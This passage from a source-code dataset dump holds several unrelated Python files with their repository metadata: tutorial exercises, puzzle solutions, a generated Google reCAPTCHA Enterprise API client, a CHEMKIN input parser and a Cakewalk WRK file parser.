and requires an explanation
\n\t\twhere there is none.
"""
print "----------"
print poem
print "----------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d beans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crates." % secret_formula(start_point)
|
[
"jacqui@mudbugmedia.com"
] |
jacqui@mudbugmedia.com
|
602bf5ff185fae424574e01f0d60bafdc9fad426
|
9d032e9864ebda8351e98ee7950c34ce5168b3b6
|
/301.py
|
10f8978082ea2c4ee7bbac60f631a00e920d68cf
|
[] |
no_license
|
snpushpi/P_solving
|
e0daa4809c2a3612ba14d7bff49befa7e0fe252b
|
9980f32878a50c6838613d71a8ee02f492c2ce2c
|
refs/heads/master
| 2022-11-30T15:09:47.890519
| 2020-08-16T02:32:49
| 2020-08-16T02:32:49
| 275,273,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,269
|
py
|
'''
Remove the minimum number of invalid parentheses in order to make the input string valid. Return all possible results.
Note: The input string may contain letters other than the parentheses ( and ).
Example 1:
Input: "()())()"
Output: ["()()()", "(())()"]
Example 2:
Input: "(a)())()"
Output: ["(a)()()", "(a())()"]
Example 3:
Input: ")("
Output: [""]
'''
def validstring(string):
count = 0
for char in string:
if char=='(':
count+=1
elif char==')':
count-=1
if count<0:
return False
return (count==0)
def main(input_string):
    # BFS over strings: each level removes one more parenthesis, so the
    # first level that yields any valid string uses the minimum removals.
    queue = [input_string]
    visited = set()
    visited.add(input_string)
    level = False  # set to True once a valid string is found at the current level
    result = []
while queue:
new_str = queue.pop(0)
if validstring(new_str):
result.append(new_str)
level= True
if level:
continue
for i in range(len(new_str)):
if not (new_str[i]==')' or new_str[i]=='('):
continue
part_string = new_str[:i]+new_str[i+1:]
if part_string not in visited:
visited.add(part_string)
queue.append(part_string)
return result
print(main("()())()"))
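# Why BFS gives minimal removals (a note on the algorithm above): strings are
# explored in order of how many characters were removed, so the first level
# containing any valid string is the level with the fewest removals. For the
# docstring's first example, "()())()" becomes valid after removing a single
# ')', yielding ["()()()", "(())()"].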
|
[
"55248448+snpushpi@users.noreply.github.com"
] |
55248448+snpushpi@users.noreply.github.com
|
d9e7c56938990536056e245fd9a4e8f269ca531c
|
a54aaaf50c84b8ffa48a810ff9a25bfe8e28ba96
|
/euler017.py
|
7b50a537c65bdf4546e8de4b9c5b747a69368e15
|
[] |
no_license
|
danielmmetz/euler
|
fd5faefdfd58de04e744316618f43c40e6cbb288
|
fe64782617d6e14b8b2b65c3a039716adb789997
|
refs/heads/master
| 2021-01-17T08:44:26.586954
| 2016-05-12T02:35:10
| 2016-05-12T02:35:10
| 40,574,287
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
"""
If the numbers 1 to 5 are written out in words: one, two, three, four, five,
then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in
words, how many letters would be used?
NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-
two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters.
The use of "and" when writing out numbers is in compliance with British usage.
"""
from collections import Counter
from num2words import num2words
from string import ascii_lowercase as letters
def answer(bound):
char_counts = Counter()
for num in xrange(1, bound+1):
char_counts += Counter(char for char in num2words(num, lang='en_GB'))
return sum(char_counts[char] for char in letters)
if __name__ == '__main__':
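    # Sanity check taken from the problem statement: writing 1 to 5 out in
    # words uses 3 + 3 + 5 + 4 + 4 = 19 letters.
    assert answer(5) == 19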
print answer(1000)
|
[
"danielmmetz@gmail.com"
] |
danielmmetz@gmail.com
|
59fafc2d56a1ca1d9d3712f7dfda2784a96c910b
|
71c331e4b1e00fa3be03b7f711fcb05a793cf2af
|
/QA-System-master/SpeechToText_test/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/recaptchaenterprise/v1/recaptchaenterprise_v1_client.py
|
79510bf7357cd70baba2a7b3f103d23cabd30234
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
iofh/QA-System
|
568228bb0c0adf9ec23b45cd144d61049e720002
|
af4a8f1b5f442ddf4905740ae49ed23d69afb0f6
|
refs/heads/master
| 2022-11-27T23:04:16.385021
| 2020-08-12T10:11:44
| 2020-08-12T10:11:44
| 286,980,492
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,467
|
py
|
"""Generated client library for recaptchaenterprise version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.py import base_api
from googlecloudsdk.third_party.apis.recaptchaenterprise.v1 import recaptchaenterprise_v1_messages as messages
class RecaptchaenterpriseV1(base_api.BaseApiClient):
"""Generated client library for service recaptchaenterprise version v1."""
MESSAGES_MODULE = messages
BASE_URL = 'https://recaptchaenterprise.googleapis.com/'
MTLS_BASE_URL = 'https://recaptchaenterprise.mtls.googleapis.com/'
_PACKAGE = 'recaptchaenterprise'
_SCOPES = ['https://www.googleapis.com/auth/cloud-platform']
_VERSION = 'v1'
_CLIENT_ID = '1042881264118.apps.googleusercontent.com'
_CLIENT_SECRET = 'x_Tw5K8nnjoRAqULM9PFAC2b'
_USER_AGENT = 'google-cloud-sdk'
_CLIENT_CLASS_NAME = 'RecaptchaenterpriseV1'
_URL_VERSION = 'v1'
_API_KEY = None
def __init__(self, url='', credentials=None,
get_credentials=True, http=None, model=None,
log_request=False, log_response=False,
credentials_args=None, default_global_params=None,
additional_http_headers=None, response_encoding=None):
"""Create a new recaptchaenterprise handle."""
url = url or self.BASE_URL
super(RecaptchaenterpriseV1, self).__init__(
url, credentials=credentials,
get_credentials=get_credentials, http=http, model=model,
log_request=log_request, log_response=log_response,
credentials_args=credentials_args,
default_global_params=default_global_params,
additional_http_headers=additional_http_headers,
response_encoding=response_encoding)
self.projects_assessments = self.ProjectsAssessmentsService(self)
self.projects_keys = self.ProjectsKeysService(self)
self.projects = self.ProjectsService(self)
class ProjectsAssessmentsService(base_api.BaseApiService):
"""Service class for the projects_assessments resource."""
_NAME = 'projects_assessments'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsAssessmentsService, self).__init__(client)
self._upload_configs = {
}
def Annotate(self, request, global_params=None):
r"""Annotates a previously created Assessment to provide additional information.
on whether the event turned out to be authentic or fradulent.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsAnnotateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse) The response message.
"""
config = self.GetMethodConfig('Annotate')
return self._RunMethod(
config, request, global_params=global_params)
Annotate.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments/{assessmentsId}:annotate',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.annotate',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}:annotate',
request_field='googleCloudRecaptchaenterpriseV1AnnotateAssessmentRequest',
request_type_name='RecaptchaenterpriseProjectsAssessmentsAnnotateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1AnnotateAssessmentResponse',
supports_download=False,
)
def Create(self, request, global_params=None):
r"""Creates an Assessment of the likelihood an event is legitimate.
Args:
request: (RecaptchaenterpriseProjectsAssessmentsCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Assessment) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/assessments',
http_method='POST',
method_id='recaptchaenterprise.projects.assessments.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/assessments',
request_field='googleCloudRecaptchaenterpriseV1Assessment',
request_type_name='RecaptchaenterpriseProjectsAssessmentsCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Assessment',
supports_download=False,
)
class ProjectsKeysService(base_api.BaseApiService):
"""Service class for the projects_keys resource."""
_NAME = 'projects_keys'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsKeysService, self).__init__(client)
self._upload_configs = {
}
def Create(self, request, global_params=None):
r"""Creates a new reCAPTCHA Enterprise key.
Args:
request: (RecaptchaenterpriseProjectsKeysCreateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Create')
return self._RunMethod(
config, request, global_params=global_params)
Create.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='POST',
method_id='recaptchaenterprise.projects.keys.create',
ordered_params=['parent'],
path_params=['parent'],
query_params=[],
relative_path='v1/{+parent}/keys',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysCreateRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def Delete(self, request, global_params=None):
r"""Deletes the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleProtobufEmpty) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='DELETE',
method_id='recaptchaenterprise.projects.keys.delete',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysDeleteRequest',
response_type_name='GoogleProtobufEmpty',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Returns the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1/{+name}',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysGetRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Returns the list of all keys that belong to a project.
Args:
request: (RecaptchaenterpriseProjectsKeysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1ListKeysResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys',
http_method='GET',
method_id='recaptchaenterprise.projects.keys.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['pageSize', 'pageToken'],
relative_path='v1/{+parent}/keys',
request_field='',
request_type_name='RecaptchaenterpriseProjectsKeysListRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1ListKeysResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
r"""Updates the specified key.
Args:
request: (RecaptchaenterpriseProjectsKeysPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecaptchaenterpriseV1Key) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1/projects/{projectsId}/keys/{keysId}',
http_method='PATCH',
method_id='recaptchaenterprise.projects.keys.patch',
ordered_params=['name'],
path_params=['name'],
query_params=['updateMask'],
relative_path='v1/{+name}',
request_field='googleCloudRecaptchaenterpriseV1Key',
request_type_name='RecaptchaenterpriseProjectsKeysPatchRequest',
response_type_name='GoogleCloudRecaptchaenterpriseV1Key',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = 'projects'
def __init__(self, client):
super(RecaptchaenterpriseV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
|
[
"ige-public@hotmail.com"
] |
ige-public@hotmail.com
|
719be2b3109d684559aae549572f8a866a01604c
|
f576a300274a5f491d60a2fbd06b276dac65a5da
|
/volumes.py
|
0a9a83f7c188b30aa4838f056887c48563f2e116
|
[] |
no_license
|
kashley007/SurgicalVolumes
|
76d81327987c7bf280ffd1a33057ae00495a1797
|
a5952f2cc169f45ad1fb9e3076e504f9443ed473
|
refs/heads/master
| 2020-07-21T19:36:50.317517
| 2016-11-16T17:25:07
| 2016-11-16T17:25:07
| 73,842,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,660
|
py
|
"""
This module executes the calculation of OR volumes
and creates a pdf report for each location found in the
data set
"""
#Import Libraries----------------------------------------------------------
import calendar
import command_line_args
import import_from_excel
import PDF
import df_manip
import endo
#--------------------------------------------------------------------------
def run_volumes_report(df, args):
"""Run a volumes report taking the parameters of df(DataFrame) and args(command-line arguments)"""
#Get all locations
location_df = df.Location.unique()
location_df = sorted(location_df, reverse=True)
if (args.month and args.year):
month_num = int(args.month)
month = calendar.month_name[month_num]
year = int(args.year)
df_month_year = df_manip.apply_month_year_filter(df, month_num, year)
total_case = 0
for i in location_df:
#Get data for month and year given at command-line
        df_location = df_manip.apply_location_filter(df_month_year, i)
        if i == 'CRMH MAIN OR':
            df_endo = endo.get_endo_cases(df_location)
            total_case = len(df_endo.index)
        #create PDF for this location
        PDF.create_pdf(df_location, month, year, i, total_case)
else:
print("Not yet built")
#--------------------------------------------------------------------------
def main():
"""Main Program Execution"""
args = command_line_args.handle_command_line_args()
df = import_from_excel.get_excel_data(args)
run_volumes_report(df, args)
if __name__ == "__main__":
main()
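# Usage sketch (hypothetical flag names; command_line_args defines the actual
# options, but month and year arguments are implied by args.month/args.year
# above):
#
#   python volumes.py --month 7 --year 2016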
|
[
"kdashley@carilion.com"
] |
kdashley@carilion.com
|
6bf0a913bcc4d96db71c5ad8e16ab1214ef394f8
|
51bd1f17a4e9942128b2c0824d397ebb74067e4c
|
/py_box3/mkm/chemkin/__init__.py
|
9f2981ce6f8ee408e5b347aef0ba9261ee2bc6fb
|
[] |
no_license
|
jonlym/py_box
|
3290db8fab2ca97fbd348d02ae4a3319207ccfb0
|
ae5187a433ef654d6b96ee98ca7ab742d83d11d9
|
refs/heads/master
| 2021-01-19T05:42:10.056427
| 2018-12-20T18:44:01
| 2018-12-20T18:44:01
| 87,442,931
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,054
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 23 14:57:39 2016
@author: Jonathan Lym
"""
from py_box3.constants import T0, convert_unit
from ase.io import read
from py_box3.thermo.thermdat import Thermdat
from py_box3.thermo.thermdats import Thermdats
import numpy as np
import os
from copy import copy
class Chemkin(object):
def __init__(self,
species = None,
sites = None,
reactions = None,
BEPs = None,
LSRs = None,
DOEs = None,
GAs = None,
SAs = None,
StatpQ = None,
reactor_type = 1,
n_runs = 1,
multi_input = True,
standard_T_and_P = True,
Ts = [],
Ps = [],
Qs = [],
SA_Vs = [],
T_rise = 0.,
isothermal = True,
linear_T_ramp = False,
external_T = 923.,
heat_transfer_area_to_volume = 3.571,
heat_transfer_coefficient = 0.,
TPD_ramp = 0.,
MARI = '',
reactant = '',
volume = 100.,
nnodes = 1,
ttout = 1.e-2,
rtime = 1.e-4,
ntdec = 10.,
save_transient = False,
set_equation_tolerance = True,
absolute_tolerance = 1.e-10,
relative_tolerance = 1.e-8,
non_negative_composition = True,
restart_max = 0,
use_iterative_solver = False,
upper_bandwidth = 0,
lower_bandwidth = 0,
use_coverage_effects = False,
use_binding_energy_corrections = False,
use_BEPs = False,
use_LSRs = False,
use_different_activation_energy = False,
use_omega = False,
omega = 0.5,
T_ref = 1.,
reaction_path_analysis_mode = 1,
verbose_reaction_path_analysis = False,
reaction_path_analysis_T = 900.,
sensitivity_analysis = False,
design_of_experiments = False):
#Objects
self.species = species
self.sites = sites
self.reactions = reactions
self.BEPs = BEPs
self.LSRs = LSRs
self.DOEs = DOEs
self.GAs = GAs
self.SAs = SAs
self.StatpQ = StatpQ
#Reactor parameters
self.reactor_type = reactor_type
self.n_runs = n_runs
self.multi_input = multi_input
self.standard_T_and_P = standard_T_and_P
self.Ts = Ts
self.Ps = Ps
self.Qs = Qs
self.SA_Vs = SA_Vs
self.T_rise = T_rise
self.external_T = external_T
self.heat_transfer_area_to_volume = heat_transfer_area_to_volume
self.heat_transfer_coefficient = heat_transfer_coefficient
self.TPD_ramp = TPD_ramp
self.MARI = MARI
self.reactant = reactant
self.volume = volume
#Reactor Options
self.isothermal = isothermal
self.linear_T_ramp = linear_T_ramp
#Solver options
self.nnodes = nnodes
self.ttout = ttout
self.rtime = rtime
self.ntdec = ntdec
self.save_transient = save_transient
self.set_equation_tolerance = set_equation_tolerance
self.absolute_tolerance = absolute_tolerance
self.relative_tolerance = relative_tolerance
self.non_negative_composition = non_negative_composition
self.restart_max = restart_max
self.use_iterative_solver = use_iterative_solver
self.upper_bandwidth = upper_bandwidth
self.lower_bandwidth = lower_bandwidth
#Reaction options
self.use_coverage_effects = use_coverage_effects
self.use_binding_energy_corrections = use_binding_energy_corrections
self.use_BEPs = use_BEPs
self.use_LSRs = use_LSRs
self.use_different_activation_energy = use_different_activation_energy
self.use_omega = use_omega
self.omega = omega
self.T_ref = T_ref
#Output options
self.reaction_path_analysis_mode = reaction_path_analysis_mode
self.verbose_reaction_path_analysis = verbose_reaction_path_analysis
self.reaction_path_analysis_T = reaction_path_analysis_T
self.sensitivity_analysis = sensitivity_analysis
self.design_of_experiments = design_of_experiments
    @classmethod
    def from_INP(cls, path = '.'):
        #NOTE: Sites, Species, Reactions, BEPs, LSRs, DOEs, GAs, SAs and
        #StatpQ are assumed to be importable from the surrounding package;
        #they are not defined in this module.
        sites = Sites.from_surf_inp(path = os.path.join(path, 'surf.inp'))
        species = Species.from_thermdat(path = os.path.join(path, 'thermdat'))
        species.get_sites(path = os.path.join(path, 'surf.inp'))
        gas_reactions = Reactions.from_gas_inp(path = os.path.join(path, 'gas.inp'))
        surf_reactions = Reactions.from_surf_inp(path = os.path.join(path, 'surf.inp'))
        #extend() mutates in place and returns None, so do not assign its result
        reactions = copy(gas_reactions)
        reactions.extend(copy(surf_reactions))
        input_dict = cls.read_tube_inp(path = os.path.join(path, 'tube.inp'), return_dict = True)
        #Optional Objects
        if input_dict['use_BEPs']:
            input_dict['BEPs'] = BEPs.from_BEP_inp(path = os.path.join(path, 'BEP.inp'))
        if input_dict['use_LSRs']:
            input_dict['LSRs'] = LSRs.from_Scale_inp(path = os.path.join(path, 'Scale.inp'))
        if input_dict['design_of_experiments']:
            input_dict['DOEs'] = DOEs.from_DOE_inp(path = os.path.join(path, 'DOE.inp'))
        #read_tube_inp does not populate 'use_GAs', so default to False
        if input_dict.get('use_GAs', False):
            input_dict['GAs'] = GAs.from_GA_inp(path = os.path.join(path, 'GA.inp'))
        if input_dict['sensitivity_analysis']:
            input_dict['SAs'] = SAs.from_SA_inp(path = os.path.join(path, 'SA.inp'))
        if input_dict['use_binding_energy_corrections']:
            input_dict['StatpQ'] = StatpQ.from_StatpQ_inp(path = os.path.join(path, 'StatpQ.inp'))
        if input_dict['multi_input']:
            #read_T_flow_inp is referenced here but not defined in this module
            (input_dict['Ts'], input_dict['Ps'], input_dict['Qs'],
             input_dict['SA_Vs']) = cls.read_T_flow_inp(path = os.path.join(path, 'T_flow.inp'))
        if input_dict['use_different_activation_energy']:
            reactions.read_EAs_inp(path = os.path.join(path, 'EAs.inp'))
            reactions.read_EAg_inp(path = os.path.join(path, 'EAg.inp'))
        return cls(species = species, sites = sites, reactions = reactions, **input_dict)
    @staticmethod
    def read_tube_inp(path = 'tube.inp', return_dict = True):
tube_dict = dict()
with open(path, 'r') as f_ptr:
i = 0
for line in f_ptr:
#Skip lines
if '!' == line[0] or 'EOF' in line:
continue
data = [x for x in line.replace('\n', '').split(' ') if x != '']
if i == 0:
tube_dict['reactor_type'] = int(data[0])
tube_dict['n_runs'] = int(data[1])
tube_dict['multi_input'] = char_to_boolean(data[2])
elif i == 1:
tube_dict['standard_T_and_P'] = char_to_boolean(data[0])
tube_dict['Ts'] = [float(data[1])]
tube_dict['Ps'] = [float(data[2])]
tube_dict['Qs'] = [float(data[3])]
tube_dict['SA_Vs'] = [float(data[4])]
tube_dict['T_rise'] = float(data[5])
elif i == 2:
tube_dict['isothermal'] = char_to_boolean(data[0])
tube_dict['linear_T_ramp'] = int(data[1])
elif i == 3:
tube_dict['external_T'] = float(data[0])
tube_dict['heat_transfer_area_to_volume'] = float(data[1])
tube_dict['heat_transfer_coefficient'] = float(data[2])
tube_dict['TPD_ramp'] = float(data[3])
elif i == 4:
tube_dict['MARI'] = data[0]
tube_dict['reactant'] = data[1]
elif i == 5:
tube_dict['volume'] = float(data[0])
tube_dict['nnodes'] = int(data[1])
tube_dict['ttout'] = float(data[2])
tube_dict['rtime'] = float(data[3])
tube_dict['ntdec'] = int(data[4])
tube_dict['save_transient'] = char_to_boolean(data[5])
elif i == 6:
tube_dict['set_equation_tolerance'] = char_to_boolean(data[0])
tube_dict['absolute_tolerance'] = float(data[1])
tube_dict['relative_tolerance'] = float(data[2])
tube_dict['non_negative_composition'] = char_to_boolean(data[3])
tube_dict['restart_max'] = int(data[4])
elif i == 7:
if data[0] == '0':
tube_dict['use_iterative_solver'] = False
elif data[0] == '1':
tube_dict['use_iterative_solver'] = True
else:
raise Exception('Invalid value for iSolver, {}'.format(data[0]))
tube_dict['upper_bandwidth'] = int(data[1])
tube_dict['lower_bandwidth'] = int(data[2])
elif i == 8:
tube_dict['use_coverage_effects'] = char_to_boolean(data[0])
tube_dict['use_binding_energy_corrections'] = char_to_boolean(data[1])
tube_dict['use_BEPs'] = char_to_boolean(data[2])
if data[3] == '0':
tube_dict['use_LSRs'] = False
elif data[3] == '3':
tube_dict['use_LSRs'] = True
else:
raise Exception('Invalid value for iScale, {}'.format(data[3]))
tube_dict['use_different_activation_energy'] = char_to_boolean(data[4])
tube_dict['use_omega'] = char_to_boolean(data[5])
tube_dict['omega'] = float(data[6])
tube_dict['T_ref'] = float(data[7])
elif i == 9:
tube_dict['reaction_path_analysis_mode'] = int(data[0])
tube_dict['verbose_reaction_path_analysis'] = char_to_boolean(data[1])
tube_dict['reaction_path_analysis_T'] = float(data[2])
tube_dict['sensitivity_analysis'] = char_to_boolean(data[3])
tube_dict['design_of_experiments'] = char_to_boolean(data[4])
i += 1
return tube_dict
    def write_tube_inp(self, path = 'tube.inp'):
        #NOTE: only the descriptive header lines are written so far; the
        #value lines (reactor type, temperatures, flows, ...) still need to
        #be formatted from this object's attributes.
        lines = []
        lines.append('!irxtr (0=UHV/mol. beam, 1=batch, 2=cstr, 3=pfr) nruns MultiInput')
        #lines.append('{}{}{}{}{}'.format(self.reactor_type))
        lines.append('!lstp t[K] p[atm] velo[cm3/s] abyv[cm-1] trise[K]')
        lines.append('!liso(yes=T,no=F) itpd (0=no, 1=UHV, 2=High Pressure) (itpd overrides liso)')
        lines.append('!text aextbyv htc ramp [K/s]')
        lines.append('!MARI Reactant')
        lines.append('!rlen[cm3] nnodes ttout [s] rtime [s] ntdec ltra (F=only SS saved, T=transient saved)')
        lines.append('!ltol abstol reltol NonNeg(F/T: constraints off/on) restart_max (<=0 means no limit)')
        lines.append('!iSolver (0/1: iterative solver off/on) mu ml (upper/lower bandwidths for Krylov solver)')
        lines.append('!lcov lStatpQ lBEP iScale lEA lomega omega Tref_beta (0: Tref=300K; 1: Tref=1K)')
        lines.append('!mrpa verbose_rpa trpa lsen lDOE')
        lines.append('EOF')
        with open(path, 'w') as f_ptr:
            #write every line, not just the first one
            f_ptr.write('\n'.join(lines) + '\n')
def char_to_boolean(character):
if character.lower() == 't':
return True
elif character.lower() == 'f':
return False
else:
raise Exception('Invalid character, {}'.format(character))
def boolean_to_char(boolean):
if boolean:
return 'T'
else:
return 'F'
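# Usage sketch (assumes the CHEMKIN-style input files named in from_INP,
# e.g. surf.inp, gas.inp, thermdat and tube.inp, exist under `path`):
#
#   chemkin = Chemkin.from_INP(path='.')
#   chemkin.write_tube_inp(path='tube_header_only.inp')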
|
[
"jonathanalym@gmail.com"
] |
jonathanalym@gmail.com
|
6aaba7d662a21da85d2ba3e6b178f7ecf8d58cd2
|
e7b07f173a8bc0d36e046c15df7bbe3d18d49a33
|
/parse.py
|
9d1894ef9159fb1b51738dbba15b24d5bcb61bc0
|
[] |
no_license
|
jcarbaugh/makeitwrk
|
82b6e8079b118e8d668b2e6858096a54da33d5a8
|
83801b19c120b4cf728b8342c4933fefe54b54d8
|
refs/heads/master
| 2020-04-06T04:55:56.785930
| 2011-08-26T19:09:27
| 2011-08-26T19:09:27
| 2,275,931
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,029
|
py
|
#!/usr/bin/env python
from struct import pack, unpack
import sys
CHUNK_TYPES = {
1: 'TRACK_CHUNK',
2: 'STREAM_CHUNK',
4: 'METER_CHUNK',
5: 'TEMPO_CHUNK',
6: 'SYSEX_CHUNK',
7: 'MEMRGN_CHUNK',
10: 'TIMEBASE_CHUNK',
# variables
3: 'VARS_CHUNK',
26: 'VARS_CHUNK_VAR',
# device stuff
33: 'DEVICES',
# track stuff?
36: 'TRACK_NAME?',
54: 'TRACK_PORT',
45: 'TRACK_DATA?',
255: 'END_CHUNK',
}
def solomon(arr, parts):
for i in range(0, parts * 8, 8):
yield arr[i:i+8]
def chunk_reader(wrkfile):
if wrkfile.read(8) != b'CAKEWALK':
raise ValueError('invalid file format')
wrkfile.read(1) # byte I don't care about
mm_version = wrkfile.read(2)
major = ord(mm_version[1])
minor = ord(mm_version[0])
version = "%i.%i" % (major, minor)
yield ('VERSION_CHUNK', 2, None, version)
    while True:
ch_type_data = wrkfile.read(1)[0]
ch_type = CHUNK_TYPES.get(ch_type_data, ch_type_data)
if ch_type == 'END_CHUNK':
break
ch_len = unpack('i', wrkfile.read(4))[0]
ch_data_offset = wrkfile.tell()
#print(ch_data_offset)
ch_data = wrkfile.read(ch_len)
yield (ch_type, ch_len, ch_data)
yield ('END_CHUNK', None, None, None)
wrkfile.close()
if __name__ == '__main__':
    for chunk in chunk_reader(sys.stdin.buffer):  # the parser needs a binary stream
print(chunk)
# if chunk[0] == 'TRACK_NAME?':
# (tnum, tname_len) = unpack('HB', chunk[2][:3])
# tname = chunk[2][3:3+tname_len].decode('utf-8')
# print("[%02i] %s" % (tnum, tname))
# elif chunk[0] == 'TRACK_DATA?':
# (tnum, schunks) = unpack('=HxH', chunk[2][:5])
# print(' ', '------------')
# for s in solomon(chunk[2][7:], schunks):
# print(' ', unpack('8B', s))
"""
__TRACK_DATA__
#2 ?? CNT- ???? 16---------------
0900 00 0700 0000 B649 009023641E00 D449 009028643C00 104A 00902B643C00 4C4A 009029643C00 884A 009023641E00 A64A 009023641E00 E24A 009023641E00
0900 00 0700 0000 1E4B 009023641E00 3C4B 009028643C00 784B 00902B643C00 B44B 009029643C00 F04B 009023641E00 0E4C 009023641E00 4A4C 009023641E00
(30, 75, 0, 144, 35, 100, 30, 0)
submeasure . . . .
measure. . . .
? . . . .
? . . .
nt? . .
? .
-----?
------------------------------------
0000 00 0800 0000 E010 009045643C00 1C11 009045643C00 5811 00904C643C00 9411 009045643C00 D011 00904D643C00 0C12 00904C643C00 4812 009048643C00 8412 009045643C00
0200 00 1400 0000 8016 00902664E001 3417 009026643C00 7017 009026647800 E817 009026647800 2418 009026643C00 6018 00902264E001 1419 009022643C00 5019 009022647800 C819 009022647800041A009022643C00401A00901F64E001F41A00901F643C00301B00901F647800A81B00901F647800E41B00901F643C00201C00902164E001D41C009021643C00101D009021647800881D009021647800C41D009021643C00
__TRACK_NAME__
#2 L2 NAME* INSTRUMENT?
0000 05 4F7267616E FFFF 1500 FFFFFFFF 00000000000000 0A 0000000000
O R G A N
0100 0B 536C617020426173732031 FFFF 2500 FFFFFFFF 00000000000000 0A 0000010000
S L A P B A S S 1
0200 0B 536C617020426173732032 FFFF 2400 FFFFFFFF 00000000000000 FE 0000020000
S L A P B A S S 2
0300 0C 4869676820537472696E6773 FFFF 2C00 FFFFFFFF 00000000000000 0A 0000030000
H I G H S T R I N G S
0900 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
-------------------------------------------
0000 05 4472756D73 FFFF FFFF FFFFFFFF 00000000000000 0A 0000090000
D R U M S
"""
|
[
"jcarbaugh@gmail.com"
] |
jcarbaugh@gmail.com
|
0285e95057b21742ade89d9041421eb988eb90fb
|
d79c152d072edd6631e22f886c8beaafe45aab04
|
/nicolock/products/rest_urls.py
|
d58d9a92a31372b447067ee3dd7508ef1d810182
|
[] |
no_license
|
kabroncelli/Nicolock
|
764364de8aa146721b2678c14be808a452d7a363
|
4c4343a9117b7eba8cf1daf7241de549b9a1be3b
|
refs/heads/master
| 2020-03-11T11:02:43.074373
| 2018-04-18T17:38:33
| 2018-04-18T17:38:33
| 129,959,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 690
|
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.conf.urls import url
from . import rest_views as views
urlpatterns = [
url(
